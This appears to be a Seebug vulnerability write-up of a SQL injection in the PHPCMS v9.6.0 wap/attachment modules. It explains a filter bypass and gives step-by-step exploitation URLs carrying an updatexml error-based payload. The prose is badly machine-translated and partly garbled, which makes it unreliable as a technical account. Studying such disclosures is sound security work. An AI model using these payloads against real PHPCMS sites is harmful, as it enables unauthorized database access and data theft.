PHPCMS v9 wap module SQL injection

ID SSV:92929
Type seebug
Reporter Zencri0er
Modified 2017-04-10T00:00:00


Suspicious of the function

1. localhost/phpcms/modules/attachment/attachments. php file of the first 241GET submitted to the src variable to bring the safe_relace function, and now we're into this damn filter function to see what it's doing

2. The filter function profile and bypass

localhost/phpcms/libs/functions/global. func. php file the line 63 to start you can see this at the incoming of the%27 and%2527 are subjected to the deletion processing that is not yet the incoming database before it has been program to eat, but in line 67 to see he ate _so that we have a way out which is the incoming% _27 program eaten by an asterisk after the%27 is incoming.*/

3. the src variable in the end?

/Where do the screenshots go back to the first screenshot of the view, in 241 lines of code to src incoming arr array after the 243 line is json_encode function encryption for json format after the incoming json_str array,and then in the 244 lines of code and the json encryption for cookies. Here I made a bold assumption that the src exists to inject so we want to pass parameters:src=%27 updatexml(1,concat(1,(user())),1)%23;then we have the incoming parameter will be a json encrypted eventually became:{src:%27 updatexml(1,concat(1,(user())),1)%23};then again is the cookie encryption here does not do the calculation of the cookie encryption values need to be of the students own echo, assuming for the time being to this, it's ultimately these actions are assigned the value of swfupload_json function.

down. php decode the sake of my

In localhost/phpcms/modules/content/down. php on line 14 The code will be a sub K variable of the decode operation so we put just the src for the encryption of SQL incoming sub K, he will decrypt the restore back to the json, the line 17 will be the json string is parsed into variable -> parse_str to & distinguish, the string is parsed into 3 variables the last incoming SQL is: {“aid":1,"src":"&id=%27 updatexml(1,concat(1,(user)),1)#&m=1&f=haha&modelid=2&catid=7&”,”filename”:””}; here you can see the before% _27 _gone as it has been is the safety function of the ate*. Finally, we see in the first 26 lines of code The id of the incoming SQL field id if so then OK we try to restore.

phpcms_v9. 6. 0_sql injection reduction Access/index. php? m=wap&c=index&a=init&siteid=1 gets a cookie value passed damn the src that the operation would otherwise be no identity.

2. Take this cookie to the value of the copy down to POST incoming userid_flash variable access/index. php? m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26 not coded inside the SQL Payload

3. On one step we already get to through the json in a cookie encrypted in the SQL, because he returns the cookie that has been encrypted SQLPayload now we pass to a sub K variable to see exactly what happened?